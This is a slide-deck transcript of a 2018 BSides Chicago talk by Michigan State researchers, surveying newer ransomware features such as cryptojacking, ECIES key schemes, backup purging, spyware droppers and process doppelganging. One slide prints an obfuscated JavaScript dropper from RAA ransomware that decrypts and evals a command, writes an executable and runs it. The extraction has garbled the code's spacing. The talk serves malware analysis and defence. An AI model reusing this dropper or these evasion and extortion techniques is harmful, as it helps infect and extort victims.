BSides - Hipster Ransomware

Transcript

1. Hipster Ransomware: Beyond Mere Encryption Pranshu Bajpai August 7, 2018

   Bsides Chicago 2018

2. Agenda 1. Introduction 2. Hipster Ransomware 3. Attributes Cryptojacking: Best

   of Both Worlds ECDH: Judging a Book by its Cover Purge Backups: The Whole Nine Yards Dropping Spyware: Adding Insult to Injury Stealing Social Engineering’s Thunder Killswitches: Blessing in Disguise Process Doppelganging: Hiding in Plain Sight 4. Conclusion 1

3. Introduction 2

4. About us Pranshu Bajpai PhD Candidate, Computer Science and Engineering,

   Michigan State University http://cse.msu.edu/~bajpaipr/ https://www.linkedin.com/in/pranshubajpai/ https://twitter.com/amirootyet Richard Enbody Associate Professor, Computer Science and Engineering, Michigan State University http://www.cse.msu.edu/~enbody/ 3

5. Related work • Young and Yung first formally introduced the

   concept of cryptoviral extortions (modern ransomware) in 1996 • Young discusses ransomware and Microsoft’s CryptoAPI in 2006 • Kharraz et al. discover in 2015 that only 6% of 1, 359 of analyzed samples were actually effective 4

6. The primary elements of a ransomware • Infiltrate • Acquire

   encryption secret (key) • Encrypt • Demand ransom 5

7. Common hybrid cryptosystem in ransomware • Ransomware compromises host •

   Generates symmetric encryption key • Encrypts symmetric key with a hard-coded asymmetric key • Provides attacker a copy of encrypted symmetric key • Encrypts user data using the symmetric key • Destroys symmetric key on host • Displays ransom note 6

8. Hipster Ransomware 7

9. Hipster Ransomware: Contemporary Subculture Hipster Ransomware Ransomware variants with innovative

   features that offer competitive, strategic or operational advantage(s) to the ransomware developer Why? • Underground market can be competitive • Need for continuous innovation • Throw off malware analysts, even if briefly 8

10. Attributes 9

11. Attributes Cryptojacking: Best of Both Worlds 10

12. Cryptojacking: Best of Both Worlds • Cryptojacking is on the

    rise • Bundle a mining routine with the ransomware Why? • Runs in the background, creates no “noise” • Especially favorable to ransomware developers in context of underdeveloped countries • At least some funds generated even when ransom is not paid • Cryptocurrencies such as Monero make it feasible to mine on an average processor 11

13. Attributes ECDH: Judging a Book by its Cover 12

14. ECDH: Judging a Book by its Cover (Image source: quora.com)

    About ECDH • Elliptic curves: y2 = x3 + ax + b • Elliptic-curve Diffie-Hellman • Generate shared secret over insecure channels • Use derived key symmetric to encrypt data Draw a line from a to b, and then continue the line. You intersect only one other point on the elliptic curve. Ransomware use Elliptic Curve Integrated Encryption Scheme or ECIES 13

15. ECDH: Judging a Book by its Cover Consider scp192k1 deployed

    in Petya: Domain parameters over Finite field, F: (p, a, b, G, n, h) • Finite Field, p = 2192 − 232 − 212 − 28 − 27 − 26 − 23 − 21 • Curve: y2 = x3 + ax + b over F • Base point, G = 03DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D • Order of G, n = FFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D • Cofactor, h = 01 Domain parameters are public! 14

16. ECDH: Judging a Book by its Cover Encryption steps taken

    by a ransomware to implement ECIES: • Domain parameters and a public key, P, ships hard-coded with the binary • Secret integar, s, is kept safe with the attacker 15

17. ECDH: Judging a Book by its Cover Upon infection •

    Generate random integar, t, using /dev/urandom or CryptGenRandom • Q = [t]G • h = H([t]P) ← encryption key! • Encrypt using h • Purge t and h from host Upon receiving payment • Demand Q from host • [s]Q = [t]P ← This important property allows deriving the same point as used on host • h = H([s]Q) • Attacker sends back h to victim 16

18. ECDH: Judging a Book by its Cover Advantages for the

    attacker • Better for marketing • ECDH not as closely scrutinized as the popular RSA • Does not depend on resident CryptoAPIs to generate symmetric key 17

19. ECDH: Judging a Book by its Cover Advantages for the

    attacker • Better for marketing • ECDH not as closely scrutinized as the popular RSA • Does not depend on resident CryptoAPIs to generate symmetric key • Offers the same security as RSA for a smaller key-size 17

20. Attributes Purge Backups: The Whole Nine Yards 18

21. Purge Backups: The Whole Nine Yards Backups on host •

    Available as a mapped drive on the network AND/OR • Windows default Shadow Volume snapshots of C: drive used by ‘System Restore’ AND/OR • Synced to the cloud using a client Ransomware • explicitly hunt for and encrypt network shares • purge VSS files on host • abuse sync clients of cloud services to encrypt files stored in cloud 19

22. Purge Backups: The Whole Nine Yards 20

23. Purge Backups: The Whole Nine Yards 21

24. Purge Backups: The Whole Nine Yards WNetAddConnection2W used to map

    network shares 22

25. Attributes Dropping Spyware: Adding Insult to Injury 23

26. Dropping Spyware: Adding Insult to Injury • Drop other malware

    such as trojans to spy on users • Attack on data availability and confidentiality • Not good for reputation hence not a common practice yet 24

27. Dropping Spyware: Adding Insult to Injury • Drop other malware

    such as trojans to spy on users • Attack on data availability and confidentiality • Not good for reputation hence not a common practice yet • No indication that spyware is removed after payment 24

28. Dropping Spyware: Adding Insult to Injury 1 f u n

    c t i o n NWvQtGjjfQX ( ) { 2 var data pn = " TVrDiQNMSFE (...) QQURE" ; 3 4 var cmd = "U2FsdGVkX1/LHQl+aIAo/ hXHDEI5YmZZtBIcL ..." ; 5 var dec cmd = CryptoJS . AES . decrypt (cmd , key cmd ) ; 6 dec cmd = CryptoJS . enc . Utf8 . s t r i n g i f y ( dec cmd ) ; 7 e v a l ( dec cmd ) ; 8 return 0; 9 } 10 11 . . . // decrypts to the following code // ... 12 var f l o = new ActiveXObject ( "ADODB.Stream" ) ; 13 var runer = WScript . CreateObject ( "WScript.Shell" ) ; 14 var wher = runer . S p e c i a l F o l d e r s ( " MyDocuments " ) ; 15 wher = wher + "\\" + "st.exe" ; 16 f l o . CharSet = "437" ; 17 f l o . Open () ; 18 var pny = data pn . r e p l a c e (/NMSIOP/g , "A" ) ; 19 var pny ar = CryptoJS . enc . Base64 . parse ( pny ) ; 20 var pny dec = pny ar . t o S t r i n g ( CryptoJS . enc . Utf8 ) ; 21 f l o . P o s i t i o n = 0 ; 22 f l o . SetEOS ; 23 f l o . WriteText ( pny dec ) ; 24 f l o . SaveToFile ( wher , 2) ; 25 f l o . Close ; 26 wher = "\"" + wher + "\"" ; 27 runer . Run( wher ) ; Key and IV embedded in the Jigsaw ransomware 25

29. Dropping Spyware: Adding Insult to Injury Trojan dropper observed in

    RAA ransomware 26

30. Attributes Stealing Social Engineering’s Thunder 27

31. Stealing Social Engineering’s Thunder • Phishing has been the predominant

    attack vector among malware • Relies on exploiting human gullibility • Attackers are moving on to more efficient attack vectors • WannaCry exploits EternalBlue • SamSam exploits weak RDP protection 28

32. Stealing Social Engineering’s Thunder WannaCry begins scanning port 445 to

    exploit EternalBlue 29

33. Attributes Killswitches: Blessing in Disguise 30

34. Blessing in Disguise Killswitch A control that effectively neutralizes the

    ransomware such that it never executes its encryption routine. • Gained widespread attention with WannaCry • Allows ransomware operators some form of control over the campaign(?) • Can be exploited by security researchers if outside the attacker’s control • NotPetya checks for perfc file in C:\Windows\... ← not really a killswitch • Will we observe more ransomware killswitches in future? 31

35. Attributes Process Doppelganging: Hiding in Plain Sight 32

36. Process Doppelganging: Hiding in Plain Sight SynAck Ransomware • First

    ransomware discovered to use process doppelganging • Uses the technique to evade detection by antivirus solutions • Avoids making unexpected changes to the filesystem • Doesn’t execute if run from unexpected locations • Doesn’t execute if keyboard setting on host is ’Cyrillic’ • Primary attack vector is RDP 33

37. Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First

    discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34

38. Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First

    discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code • Load malicious executable Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34

39. Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First

    discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code • Load malicious executable • Rollback to original Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34

40. Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First

    discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code • Load malicious executable • Rollback to original • Execute malicious code Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34

41. Conclusion 35

42. Conclusion • Ransomware innovate and evolve—just like any other products

    • What is hipster today might become a trend tomorrow • Early anticipation of future malware trends help create better responses • 36

43. Questions • BSides Chicago organizers • For the support! •

    Michigan State infosec team • For continuous help and support! Questions @amirootyet 37